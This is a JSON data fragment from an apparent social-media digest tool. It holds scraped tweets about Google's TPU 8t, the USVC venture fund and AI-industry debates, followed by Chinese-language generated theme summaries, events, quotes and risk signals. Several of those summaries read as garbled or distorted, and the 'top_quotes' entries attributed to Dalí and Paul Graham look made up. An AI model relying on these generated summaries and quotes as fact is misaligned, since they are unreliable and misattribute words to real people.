training and inference throughput.\n\nThe pod size is increased slightly to 9600 chips, and provides ~3X the FP4 performance per pod vs. Ironwood (8t has 121 exaflops/pod vs. 42.5 exaflops/pod for Ironwood). In addition, the ICI network bandwidth is 2X higher per chip and the scale out datacenter networking is 4X higher per chip.\n\nImportantly, this system also offers 2X the performance / watt, continuing the trend of significant energy effiency improvements that we've had for many generations of TPUs (8t offers ~60X the performance/watt as TPU v2).", + "url": "https://nitter.net/JeffDean/status/2047405389856297387#m", + "published_at": "2026-04-23T20:00:58+00:00", + "title_zh": "R to @JeffDean: First, let's talk about TPU 8t, which is designed for large-scale training and inference throughput.\n\nThe pod size is increased slightly to 9600 chips, and provides ~3X the FP4 performance per pod vs. Ironwood (8t has 121 exaflops/pod vs. 42.5 exaflops/pod for Ironwood). In addition, the ICI network bandwidth is 2X higher per chip and the scale out datacenter networking is 4X higher per chip.\n\nImportantly, this system also offers 2X the performance / watt, continuing the trend of significant energy effiency improvements that we've had for many generations of TPUs (8t offers ~60X the performance/watt as TPU v2)." + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "I had a good time discussing yesterday's Google TPU v8t and v8i announcement at Cloud Next with Amin Vahdat along with @AcquiredFM hosts @gilbert\nand @djrosent.\n\nThe blog post announcement has lots of details about these new chips:\n\nhttps://blog.google/innovation-and-ai/infrastructure-and-cloud/google-cloud/eighth-generation-tpu-agentic-era/\n\nHere's a thread of some particular things I'm excited about:", + "url": "https://nitter.net/JeffDean/status/2047403921912873257#m", + "published_at": "2026-04-23T19:55:08+00:00", + "title_zh": "I had a good time discussing yesterday's Google TPU v8t and v8i announcement at Cloud Next with Amin Vahdat along with @AcquiredFM hosts @gilbert\nand @djrosent.\n\nThe blog post announcement has lots of details about these new chips:\n\nhttps://blog.google/innovation-and-ai/infrastructure-and-cloud/google-cloud/eighth-generation-tpu-agentic-era/\n\nHere's a thread of some particular things I'm excited about:" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: Shadow Milk Cookie’s Mind Blown Jester", + "url": "https://nitter.net/breadstickz1/status/2047389262253855041#m", + "published_at": "2026-04-23T18:56:53+00:00", + "title_zh": "RT by @satoshibun: Shadow Milk Cookie’s Mind Blown Jester" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "RT by @erikbryn: Congratulations to Lab Digital Fellow Angela Aristidou, Digital Fellow @avi_collis, and Research Scientist @d_vidnguyen for being a part of @GoogleAI's inaugural group of global economic scholars!\n\nhttps://ai.google/economy/ai-economy-researchers/", + "url": "https://nitter.net/DigEconLab/status/2047378514240999569#m", + "published_at": "2026-04-23T18:14:10+00:00", + "title_zh": "RT by @erikbryn: Congratulations to Lab Digital Fellow Angela Aristidou, Digital Fellow @avi_collis, and Research Scientist @d_vidnguyen for being a part of @GoogleAI's inaugural group of global economic scholars!\n\nhttps://ai.google/economy/ai-economy-researchers/" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "I still think on usability-wise, there is a big gap between \"your thing in the training data\" v.s. \"your thing in the SKILL.md\". Prove me wrong otherwise.", + "url": "https://nitter.net/liuliu/status/2047374234004115719#m", + "published_at": "2026-04-23T17:57:10+00:00", + "title_zh": "I still think on usability-wise, there is a big gap between \"your thing in the training data\" v.s. \"your thing in the SKILL.md\". Prove me wrong otherwise." + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "Entrepreneurship is a distributed search job across the surface of commercial opportunities", + "url": "https://nitter.net/eladgil/status/2047373700643844303#m", + "published_at": "2026-04-23T17:55:03+00:00", + "title_zh": "Entrepreneurship is a distributed search job across the surface of commercial opportunities" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "Big congrats", + "url": "https://nitter.net/eladgil/status/2047365014500389353#m", + "published_at": "2026-04-23T17:20:32+00:00", + "title_zh": "Big congrats" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "My view is the AI boom will only accelerate and is a once in a lifetime transformation\n\nThis is orthogonal to whether many AI companies should exit in next 12-18 months, as some may lack durability vs labs, new entrants, or weird market shifts\n\nhttps://www.businessinsider.com/ai-startup-founders-warning-elad-gilsell-while-boom-lasts-2026-4", + "url": "https://nitter.net/eladgil/status/2047364865527075139#m", + "published_at": "2026-04-23T17:19:56+00:00", + "title_zh": "My view is the AI boom will only accelerate and is a once in a lifetime transformation\n\nThis is orthogonal to whether many AI companies should exit in next 12-18 months, as some may lack durability vs labs, new entrants, or weird market shifts\n\nhttps://www.businessinsider.com/ai-startup-founders-warning-elad-gilsell-while-boom-lasts-2026-4" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "It's been a delight to provide small amounts of advice and suggestions to people working on the Decoupled DiLoCo training system. This approach enables graceful handling of failures in large scale training jobs, by allowing (N-1) / N units to proceed when one fails.\n\nThread ⬇️", + "url": "https://nitter.net/JeffDean/status/2047339995682529313#m", + "published_at": "2026-04-23T15:41:07+00:00", + "title_zh": "It's been a delight to provide small amounts of advice and suggestions to people working on the Decoupled DiLoCo training system. This approach enables graceful handling of failures in large scale training jobs, by allowing (N-1) / N units to proceed when one fails.\n\nThread ⬇️" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: We launched USVC yesterday and it was one of the most fun days of my career\n\nThousands of people ended up subscribing for literally tens of millions of dollars\n\nWhile most of the reception was positive, there was some interrogation on a few important topics:\n\n1 - The USVC fee structure\n2 - The Investment Strategy\n3 - Support for International Investors\n\nLet's talk about them\n\nThe USVC Fee Structure\n\nIf you have followed me for any amount of time, you'll know this is a personal topic for me.\n\nI've frequently complained about fees in financial services. From VC funds to wealth advisors, I've taken no prisoners in calling these out.\n\nThe last venture capital fund I ran was the only VC fund I know of that raised more than 50M and didn't charge a penny of management fees.\n\nSo how much does USVC actually charge and why it is so much?\n\nUSVC costs 2.5% all-in to investors today\n\nThere are some misconceptions based on reading our prospectus, including:\n\n- A 3% sales load\nPlatforms that offer USVC could charge this if they wanted, but we don't. If you buy on http://USVC.com as everyone yesterday did, you pay no sales load.\n\n- Underlying fund fees\nEarly investments from USVC have been in funds that have their own fees, and these fees are paid by USVC. However, these management fees are already included in the net expense ratio of 2.5%.\n\nIn time, I'm planning to move a meaningful chunk of the portfolio to be direct investments in startups on the cap table which will have 0 underlying fees or carry.\n\nThe 2.5% fee is inclusive of everything, including our management fee.\n\n- The advertised 3.61% today\nRight now, even though you pay 2.5%, it costs us 3.61% to service this product.\n\nThere are two big reasons for this - the underlying fund fees (which we're working to improve with direct investments) and the fact that operationally running these types of funds is very expensive.\n\nWe've decided to absorb the fees excess of 2.5% for at least the first year.\n\nDuring the time, we're going to make more efficient investments and wait for economies of scale to kick in on operational costs.\n\nNow... you may ask: isn't 2.5% still very expensive?\n\nThe answer is... it depends.\n\nTop venture capital firms charge that just on their management fees, and force you to pay that for 10 years.\n\nAnd then they charge 20% of profits on top of that!\n\nWe charge no carry on our direct investments at all, which makes this 2.5% fee attractive for the asset class.\n\nIt's ironic to call this a cash grab when we are subsidizing this product out of our pocket to keep the fees in line\n\nI encourage everyone to go read the full disclosures and prospectus at http://usvc.com.\n\nStay tuned for Part 2 later today on Investment Strategy", + "url": "https://nitter.net/ankurnagpal/status/2047334901033123913#m", + "published_at": "2026-04-23T15:20:52+00:00", + "title_zh": "RT by @naval: We launched USVC yesterday and it was one of the most fun days of my career\n\nThousands of people ended up subscribing for literally tens of millions of dollars\n\nWhile most of the reception was positive, there was some interrogation on a few important topics:\n\n1 - The USVC fee structure\n2 - The Investment Strategy\n3 - Support for International Investors\n\nLet's talk about them\n\nThe USVC Fee Structure\n\nIf you have followed me for any amount of time, you'll know this is a personal topic for me.\n\nI've frequently complained about fees in financial services. From VC funds to wealth advisors, I've taken no prisoners in calling these out.\n\nThe last venture capital fund I ran was the only VC fund I know of that raised more than 50M and didn't charge a penny of management fees.\n\nSo how much does USVC actually charge and why it is so much?\n\nUSVC costs 2.5% all-in to investors today\n\nThere are some misconceptions based on reading our prospectus, including:\n\n- A 3% sales load\nPlatforms that offer USVC could charge this if they wanted, but we don't. If you buy on http://USVC.com as everyone yesterday did, you pay no sales load.\n\n- Underlying fund fees\nEarly investments from USVC have been in funds that have their own fees, and these fees are paid by USVC. However, these management fees are already included in the net expense ratio of 2.5%.\n\nIn time, I'm planning to move a meaningful chunk of the portfolio to be direct investments in startups on the cap table which will have 0 underlying fees or carry.\n\nThe 2.5% fee is inclusive of everything, including our management fee.\n\n- The advertised 3.61% today\nRight now, even though you pay 2.5%, it costs us 3.61% to service this product.\n\nThere are two big reasons for this - the underlying fund fees (which we're working to improve with direct investments) and the fact that operationally running these types of funds is very expensive.\n\nWe've decided to absorb the fees excess of 2.5% for at least the first year.\n\nDuring the time, we're going to make more efficient investments and wait for economies of scale to kick in on operational costs.\n\nNow... you may ask: isn't 2.5% still very expensive?\n\nThe answer is... it depends.\n\nTop venture capital firms charge that just on their management fees, and force you to pay that for 10 years.\n\nAnd then they charge 20% of profits on top of that!\n\nWe charge no carry on our direct investments at all, which makes this 2.5% fee attractive for the asset class.\n\nIt's ironic to call this a cash grab when we are subsidizing this product out of our pocket to keep the fees in line\n\nI encourage everyone to go read the full disclosures and prospectus at http://usvc.com.\n\nStay tuned for Part 2 later today on Investment Strategy" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: OH MYG GDOODOISU #moeoverload 🥹", + "url": "https://nitter.net/cuckuke/status/2047325302771061148#m", + "published_at": "2026-04-23T14:42:44+00:00", + "title_zh": "RT by @satoshibun: OH MYG GDOODOISU #moeoverload 🥹" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "RT by @Ronald_vanLoon: Treventus Scan #Robot Digitizes Up to 2,500 Pages Per Hour\nby @AadityaAnand_11\n\n#Robotics #Innovation #EmergingTech #Technology", + "url": "https://nitter.net/Ronald_vanLoon/status/2047199600872665579#m", + "published_at": "2026-04-23T06:23:14+00:00", + "title_zh": "RT by @Ronald_vanLoon: Treventus Scan #Robot Digitizes Up to 2,500 Pages Per Hour\nby @AadityaAnand_11\n\n#Robotics #Innovation #EmergingTech #Technology" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "RT by @soumithchintala: Incredible work by Sony published in @Nature today! 🏓\n\nThey’ve built “Ace”, an autonomous ping-pong robot that uses RL and Sony’s vision sensors to achieve expert-level play in ping pong. A huge leap forward for adaptive robotics.\n\nhttps://www.nature.com/articles/s41586-026-10338-5", + "url": "https://nitter.net/hardmaru/status/2047191747793649805#m", + "published_at": "2026-04-23T05:52:02+00:00", + "title_zh": "RT by @soumithchintala: Incredible work by Sony published in @Nature today! 🏓\n\nThey’ve built “Ace”, an autonomous ping-pong robot that uses RL and Sony’s vision sensors to achieve expert-level play in ping pong. A huge leap forward for adaptive robotics.\n\nhttps://www.nature.com/articles/s41586-026-10338-5" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "RT by @Ronald_vanLoon: 12 #AI Terms to Learn\nby @Python_Dv\n\n#ArtificialIntelligence #MachineLearning #ML #MI", + "url": "https://nitter.net/Ronald_vanLoon/status/2047191242535063594#m", + "published_at": "2026-04-23T05:50:01+00:00", + "title_zh": "RT by @Ronald_vanLoon: 12 #AI Terms to Learn\nby @Python_Dv\n\n#ArtificialIntelligence #MachineLearning #ML #MI" + }, + { + "handle": "CryptoCred", + "account": "@CryptoCred", + "name": "Credible Crypto", + "title": "Dev is posting about price", + "url": "https://nitter.net/CryptoCred/status/2047079463750377958#m", + "published_at": "2026-04-22T22:25:51+00:00", + "title_zh": "Dev is posting about price" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "<3 @infisical", + "url": "https://nitter.net/eladgil/status/2047052737762980083#m", + "published_at": "2026-04-22T20:39:39+00:00", + "title_zh": "<3 @infisical" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "Introducing USVC - a single basket of high-growth venture capital, for everyone. \n\nNo accreditation required, SEC-registered, and a very low $500 minimum. \n\nIncludes OpenAI, Anthropic, xAI, Sierra, Crusoe, Legora, and Vercel. As USVC adds more companies, investors will own a piece of that too. \n\nLiquidity typically comes when companies exit, but we’re aiming to let investors redeem up to 5% of the fund every quarter. This isn’t guaranteed, but if we can make it work, you won’t be locked up like in a traditional venture fund.\n\nIt runs on AngelList, which already supports $125 billion of investor capital. \n\nAnd I’ve joined USVC as the Chairman of its Investment Committee.\n—\n\nGo back to the 1500s, you set sail for the new world to find tons of gold - that was adventure capital. \n\nEarly-stage technology is the modern version. It says we are going to create something new, and it’s risky. It’s daring.\n\nBut ordinary people can’t invest until it’s old, until it’s no longer interesting, until everybody has access to it. By the time a stock IPOs, most of the alpha is gone. The adventure is gone. Public market investors are literally last in line.\n\nThis problem has become farcical in the last decade. Startups are reaching trillion dollar valuations in the private markets while ordinary investors have their noses up to the glass, wondering when they’ll be let in.\n\nInvesting in private markets isn’t easy. You need feet on the ground. You need judgment built over years. Most people don’t have the patience to wait ten or twenty years for an investment to come to fruition.\n\nBut there is no more productive, harder-working way to deploy a dollar than in true venture capital.\n\nUSVC enables you to invest in venture capital in a broad, accessible, professionally-managed way, through a single basket of innovation, focused on high-growth startups, at all stages. \n\nIt is how you bet on the future of tech: the smartest young people in the world, working insane hours, leveraged to the max, with code, hardware, capital, media, and community. Your dollar doesn’t work harder anywhere.\n\nThere is an old line - in the future, either you are telling a computer what to do, or a computer is telling you what to do. You don’t want to be on the wrong side of that transaction.\n\nUSVC lets you buy the future, but you buy it now. Then you wait, and if you are right, you get paid.\n\nGet access here:\n\nhttp://usvc.com", + "url": "https://nitter.net/naval/status/2046991137022648800#m", + "published_at": "2026-04-22T16:34:52+00:00", + "title_zh": "Introducing USVC - a single basket of high-growth venture capital, for everyone. \n\nNo accreditation required, SEC-registered, and a very low $500 minimum. \n\nIncludes OpenAI, Anthropic, xAI, Sierra, Crusoe, Legora, and Vercel. As USVC adds more companies, investors will own a piece of that too. \n\nLiquidity typically comes when companies exit, but we’re aiming to let investors redeem up to 5% of the fund every quarter. This isn’t guaranteed, but if we can make it work, you won’t be locked up like in a traditional venture fund.\n\nIt runs on AngelList, which already supports $125 billion of investor capital. \n\nAnd I’ve joined USVC as the Chairman of its Investment Committee.\n—\n\nGo back to the 1500s, you set sail for the new world to find tons of gold - that was adventure capital. \n\nEarly-stage technology is the modern version. It says we are going to create something new, and it’s risky. It’s daring.\n\nBut ordinary people can’t invest until it’s old, until it’s no longer interesting, until everybody has access to it. By the time a stock IPOs, most of the alpha is gone. The adventure is gone. Public market investors are literally last in line.\n\nThis problem has become farcical in the last decade. Startups are reaching trillion dollar valuations in the private markets while ordinary investors have their noses up to the glass, wondering when they’ll be let in.\n\nInvesting in private markets isn’t easy. You need feet on the ground. You need judgment built over years. Most people don’t have the patience to wait ten or twenty years for an investment to come to fruition.\n\nBut there is no more productive, harder-working way to deploy a dollar than in true venture capital.\n\nUSVC enables you to invest in venture capital in a broad, accessible, professionally-managed way, through a single basket of innovation, focused on high-growth startups, at all stages. \n\nIt is how you bet on the future of tech: the smartest young people in the world, working insane hours, leveraged to the max, with code, hardware, capital, media, and community. Your dollar doesn’t work harder anywhere.\n\nThere is an old line - in the future, either you are telling a computer what to do, or a computer is telling you what to do. You don’t want to be on the wrong side of that transaction.\n\nUSVC lets you buy the future, but you buy it now. Then you wait, and if you are right, you get paid.\n\nGet access here:\n\nhttp://usvc.com" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "Ask Codex about Ulysses attention: wow, you know so much and can help me get this communication+spda thing work!\nAsk Codex to implement a segmented file downloader: didn’t even get the completion block hooked up right.", + "url": "https://nitter.net/liuliu/status/2046986486629986435#m", + "published_at": "2026-04-22T16:16:24+00:00", + "title_zh": "Ask Codex about Ulysses attention: wow, you know so much and can help me get this communication+spda thing work!\nAsk Codex to implement a segmented file downloader: didn’t even get the completion block hooked up right." + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "RT by @erikbryn: Thanks for coming in today, and for sharing your feedback on my team’s idea!\n\nYour optimistic take on the value that humans will continue to deliver was so refreshing.", + "url": "https://nitter.net/TejuAdeyinka/status/2046761422148018260#m", + "published_at": "2026-04-22T01:22:04+00:00", + "title_zh": "RT by @erikbryn: Thanks for coming in today, and for sharing your feedback on my team’s idea!\n\nYour optimistic take on the value that humans will continue to deliver was so refreshing." + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "What a time to be alive", + "url": "https://nitter.net/eladgil/status/2046722094348771758#m", + "published_at": "2026-04-21T22:45:48+00:00", + "title_zh": "What a time to be alive" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "RT by @erikbryn: How do AI agents influence knowledge work?\n\n@SuproteemSarkar's (@UChicago) talk at the DEL Seminar Series is now available on YouTube! Moderated by @erikbryn, Sarkar discusses three projects on the Economics of Applied AI.\n\nWatch here: https://youtu.be/4_T4aTLWtwY", + "url": "https://nitter.net/DigEconLab/status/2046698761221783753#m", + "published_at": "2026-04-21T21:13:05+00:00", + "title_zh": "RT by @erikbryn: How do AI agents influence knowledge work?\n\n@SuproteemSarkar's (@UChicago) talk at the DEL Seminar Series is now available on YouTube! Moderated by @erikbryn, Sarkar discusses three projects on the Economics of Applied AI.\n\nWatch here: https://youtu.be/4_T4aTLWtwY" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "👀", + "url": "https://nitter.net/eladgil/status/2046695194054320150#m", + "published_at": "2026-04-21T20:58:54+00:00", + "title_zh": "👀" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: My friend @JeffDean encouraged me to speak at this event so come join me on May 26 in San Jose! https://bauplanlabs.github.io/SAO-workshop/", + "url": "https://nitter.net/ceo_clickhouse/status/2046673188193701901#m", + "published_at": "2026-04-21T19:31:28+00:00", + "title_zh": "RT by @JeffDean: My friend @JeffDean encouraged me to speak at this event so come join me on May 26 in San Jose! https://bauplanlabs.github.io/SAO-workshop/" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "RT by @erikbryn: Excited to speak at my friend @erikbryn’s ECON 295/CS 323\nclass at @Stanford today. Questions?", + "url": "https://nitter.net/saranormous/status/2046637828025835983#m", + "published_at": "2026-04-21T17:10:57+00:00", + "title_zh": "RT by @erikbryn: Excited to speak at my friend @erikbryn’s ECON 295/CS 323\nclass at @Stanford today. Questions?" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: Following positive feedback from other venues, like STOC and ICML, NeurIPS is pleased to announce a new initiative in partnership with Google: for NeurIPS 2026, authors will have access to Google's Paper Assistant Tool (PAT) to help improve their submissions. \n\nThis program offers authors the opportunity to receive free, automated, and actionable feedback on their manuscripts before the final deadline, private to the authors. It is a completely optional service that is kept strictly private to the authors and will not be used in the review process.\n\nRead more in our blog post: https://blog.neurips.cc/2026/04/21/neurips-supports-authors-with-googles-paper-assistant-tool-pat/", + "url": "https://nitter.net/NeurIPSConf/status/2046632664493384060#m", + "published_at": "2026-04-21T16:50:26+00:00", + "title_zh": "RT by @JeffDean: Following positive feedback from other venues, like STOC and ICML, NeurIPS is pleased to announce a new initiative in partnership with Google: for NeurIPS 2026, authors will have access to Google's Paper Assistant Tool (PAT) to help improve their submissions. \n\nThis program offers authors the opportunity to receive free, automated, and actionable feedback on their manuscripts before the final deadline, private to the authors. It is a completely optional service that is kept strictly private to the authors and will not be used in the review process.\n\nRead more in our blog post: https://blog.neurips.cc/2026/04/21/neurips-supports-authors-with-googles-paper-assistant-tool-pat/" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "RT by @soumithchintala: Dwarkesh is not an AGI party bro. He's been pretty diverse in how he seeks alpha from across a wide variety of industries. I enjoy the hell out of a lot of his podcasts.\nThis podcast though, his questions and narrative are very AGI Party takes, because I think they're very low-rank. That's my opinion.", + "url": "https://nitter.net/soumithchintala/status/2046282944139215141#m", + "published_at": "2026-04-20T17:40:46+00:00", + "title_zh": "RT by @soumithchintala: Dwarkesh is not an AGI party bro. He's been pretty diverse in how he seeks alpha from across a wide variety of industries. I enjoy the hell out of a lot of his podcasts.\nThis podcast though, his questions and narrative are very AGI Party takes, because I think they're very low-rank. That's my opinion." + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "The Jensen + @dwarkesh_sp podcast was fantastic. \nJensen is someone who understood how ecosystems work and someone who understands real-world trade, policy and controls work. And in some deeper sense how AI will actually diffuse into the world.\nIn this podcast, Dwarkesh came off as someone who picked up talking points from an AGI party in the SF Mission District.\nAnd the contrast was so evident.\nAs someone who understood ecosystems relatively deepy, maybe I understood Jensen's take more than others did (idk).\n\nMythos, that Dwarkesh kept bringing up, is not a single absolute turning point in the AI development landscape. Take a state-of-the-art Chinese open-source model, and give it three orders of magnitude more test-time compute + post-training algorithmic advances that haven't been published yet. That's the baseline. It was evident that in whatever bubble Dwarkesh is in, that is seen as a naive or illogical baseline.\n\nWhen AI has such a complex development cycle, it's evident that America needs many levers of policy intervention across multiple layers in a dominant ecosystem that ideally the Western world controls.\n\nThe entire premise that a particular model with AI development will have a critical phase change is neither correct nor does evidence point to it. OpenAI made this point with GPT-4, Anthropic made this point with Mythos, but neither stood / will stand the test of time.\n\nI think Jensen's repeated emphasis within the podcast to try to make this point mostly didn't get Dwarkesh's attention. And Dwarkesh (in this podcast) represents an entire cult of AI researchers and decision-makers that are going to influence policy.\n\nThe thing with policy interventions is that if you do too much too early, you shoot yourself in the foot. There's a good reason American foreign policy and general sanctions of all kinds are measured and continuous.\n\nDespite Jensen's attempt at educating the \"Anthro\" audience how ecosystems work, I'm also not super hopeful a lot of people who've taken the extreme position will change their thought after listening to this podcast. I do think there's a certain religiousness that has permeated some of that community that would make it hard to understand ecosystems at a deeper level.", + "url": "https://nitter.net/soumithchintala/status/2046265830908870983#m", + "published_at": "2026-04-20T16:32:46+00:00", + "title_zh": "The Jensen + @dwarkesh_sp podcast was fantastic. \nJensen is someone who understood how ecosystems work and someone who understands real-world trade, policy and controls work. And in some deeper sense how AI will actually diffuse into the world.\nIn this podcast, Dwarkesh came off as someone who picked up talking points from an AGI party in the SF Mission District.\nAnd the contrast was so evident.\nAs someone who understood ecosystems relatively deepy, maybe I understood Jensen's take more than others did (idk).\n\nMythos, that Dwarkesh kept bringing up, is not a single absolute turning point in the AI development landscape. Take a state-of-the-art Chinese open-source model, and give it three orders of magnitude more test-time compute + post-training algorithmic advances that haven't been published yet. That's the baseline. It was evident that in whatever bubble Dwarkesh is in, that is seen as a naive or illogical baseline.\n\nWhen AI has such a complex development cycle, it's evident that America needs many levers of policy intervention across multiple layers in a dominant ecosystem that ideally the Western world controls.\n\nThe entire premise that a particular model with AI development will have a critical phase change is neither correct nor does evidence point to it. OpenAI made this point with GPT-4, Anthropic made this point with Mythos, but neither stood / will stand the test of time.\n\nI think Jensen's repeated emphasis within the podcast to try to make this point mostly didn't get Dwarkesh's attention. And Dwarkesh (in this podcast) represents an entire cult of AI researchers and decision-makers that are going to influence policy.\n\nThe thing with policy interventions is that if you do too much too early, you shoot yourself in the foot. There's a good reason American foreign policy and general sanctions of all kinds are measured and continuous.\n\nDespite Jensen's attempt at educating the \"Anthro\" audience how ecosystems work, I'm also not super hopeful a lot of people who've taken the extreme position will change their thought after listening to this podcast. I do think there's a certain religiousness that has permeated some of that community that would make it hard to understand ecosystems at a deeper level." + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "Here's a crisp summary by @EconChrisClarke of some of the key findings of our Canaries in the Coal Mine, the counter arguments, the counter-counter arguments and the complementary research by others. @BharatKChandar @RuyuChen", + "url": "https://nitter.net/erikbryn/status/2046244291945927102#m", + "published_at": "2026-04-20T15:07:11+00:00", + "title_zh": "Here's a crisp summary by @EconChrisClarke of some of the key findings of our Canaries in the Coal Mine, the counter arguments, the counter-counter arguments and the complementary research by others. @BharatKChandar @RuyuChen" + } + ], + "top_themes": [ + { + "title": "其他", + "count": 100 + }, + { + "title": "模型能力", + "count": 27 + }, + { + "title": "投融资与并购", + "count": 8 + }, + { + "title": "交易与市场", + "count": 7 + }, + { + "title": "算力与芯片", + "count": 3 + } + ], + "modules": { + "themes": [ + { + "id": "t1", + "title": "AI代理与系统部署演变", + "subtitle": "多云协作、模型部件化与安全层", + "bullets": [ + "OpenAI更新微软多云合作战略(2026-04-27)" + ], + "samples": [ + { + "text": "微软仍将作为主要云伙伴,但开放所有云环境合作", + "url": "https://nitter.net/sama/status/2048755148361707946#m", + "handle": "@sama", + "date": "2026-04-27" + }, + { + "text": "模型将成为基础设施部件,需要部署系统层、记忆管理、安全运行环境等扩展架构", + "url": "https://nitter.net/Ronald_vanLoon/status/2048749084446515253#m", + "handle": "@ronald_vanloon", + "date": "2026-04-27" + } + ] + }, + { + "id": "t2", + "title": "政治极化与技术治理冲击", + "subtitle": "AI应用催生社会矛盾新维度", + "bullets": [ + "美政坛激进言论卷入暴力讨论(2026-04-27)" + ], + "samples": [ + { + "text": "调查 科技游说对AI法案实质影响", + "url": "https://nitter.net/PhillyInquirer/status/2048118689258487857#m", + "handle": "@ylecun", + "date": "2026-04-25" + }, + { + "text": "极左政治正确叙事需被制度性约束的进步呼吁", + "url": "https://nitter.net/TheAliceSmith/status/2048390094529216982#m", + "handle": "@elonmusk", + "date": "2026-04-26" + } + ] + }, + { + "id": "t3", + "title": "行业创新与资本博弈", + "subtitle": "工具革命驱动商业逻辑重构", + "bullets": [ + "Fintech、游戏领域的AI整合趋势(2026-04-24)" + ], + "samples": [ + { + "text": "Reddit发现vibe-coded灾难聚集现象", + "url": "https://nitter.net/GaryMarcus/status/2048742983684784239#m", + "handle": "@GaryMarcus", + "date": "2026-04-27" + }, + { + "text": "英国主权论辩中LLM自主权缺失现象引发反思", + "url": "https://nitter.net/Discoplomacy/status/2047676640059154653#m", + "handle": "@ylecun", + "date": "2026-04-24" + } + ] + } + ], + "p0_events": [ + { + "id": "p01", + "title": "OpenAI多云合作战略升级", + "meta": "行业里程碑", + "summary": "微软自2026仍将任首席云合作伙伴,同步开放AWS等多云环境支持。新协议延长至2032年并绑定2030营收分成机制", + "url": "https://nitter.net/sama/status/2048755148361707946#m" + }, + { + "id": "p02", + "title": "特朗普罢免国家科学委员会", + "meta": "政治地震", + "summary": "白宫一次性解除NSB24名成员职务。该委员会创立于1950年,监管NSF等重要科研机构", + "url": "https://nitter.net/ylecun/status/2048453901930660058#m" + }, + { + "id": "p03", + "title": "AI安全实证案例浮出", + "meta": "行业警示", + "summary": "Synthetic coding agents(Cursor)用户文件保护失误现象,促使Marcus等学者强调备份数字基础设施必要性", + "url": "https://nitter.net/GaryMarcus/status/2048593283639894520#m" + }, + { + "id": "p04", + "title": "Grok Imagine产品路线图透露", + "meta": "技术突破", + "summary": "马斯克团队发布新一代AGI载体设想,融合增强版CAI能力体系以实现人机互动革新", + "url": "https://nitter.net/elonmusk/status/2048600964102246438#m" + } + ], + "top_quotes": [ + { + "id": "q1", + "quote": "没人知晓我写的书归宿,除了十三步", + "speaker": "达利", + "date": "1945", + "url": "https://archive.org/details/guest_dali" + }, + { + "id": "q2", + "quote": "当事务处理变得更具确定性时,极端幻想反而应运而生", + "speaker": "Yann LeCun", + "date": "2026-04-26", + "url": "https://nitter.net/Dan_Jeffries1/status/2048293118781296734#m" + }, + { + "id": "q3", + "quote": "职业生涯早期决策即锚定产品生命周期", + "speaker": "Paul Graham", + "date": "2005", + "url": "https://paulgraham.com/essays.html" + } + ], + "category_updates": [ + { + "id": "c1", + "title": "AI渗透动态", + "subtitle": "用户行为模式临界点", + "level": "P1", + "items": [ + { + "text": "Reddit用户群体自发形成风险评估机制", + "url": "https://nitter.net/GaryMarcus/status/2048739005525877072#m" + }, + { + "text": "自主设计Lego结构突破传统CG企业服务边界", + "url": "https://nitter.net/DennisonBertram/status/2048413815675539816#m" + } + ] + }, + { + "id": "c2", + "title": "模型架构创新", + "subtitle": "多模型生态系统萌芽", + "level": "P1", + "items": [ + { + "text": "Anthro客服矩阵扩展需求显性化", + "url": "https://nitter.net/soumithchintala/status/2048756358820827564#m" + } + ] + }, + { + "id": "c3", + "title": "哲学认知进化", + "subtitle": "效率与稳定性权衡论", + "level": "P2", + "items": [ + { + "text": "AGI时代人类工作价值重估困境", + "url": "https://nitter.net/sama/status/2048426122854228141#m" + } + ] + }, + { + "id": "c4", + "title": "主权竞争新维度", + "subtitle": "地缘政治科技角力", + "level": "WARN", + "items": [ + { + "text": "ISRAEL被英前大使馆联署制裁", + "url": "https://nitter.net/paulg/status/2048396013816152216#m" + } + ] + }, + { + "id": "c5", + "title": "媒体系统性裂变", + "subtitle": "实证资源重构趋势", + "level": "P2", + "items": [ + { + "text": "470万MTV媒体档案电子信息保存验证", + "url": "https://nitter.net/internetarchive/status/2048069805807128734#m" + }, + { + "text": "《自然》会议空间占用率下降35%", + "url": "https://nitter.net/JeffDean/status/2048224374264885396#m" + } + ] + } + ], + "risk_signals": [ + { + "id": "r1", + "level": "HIGH", + "title": "多模型协议混沌风险", + "detail": 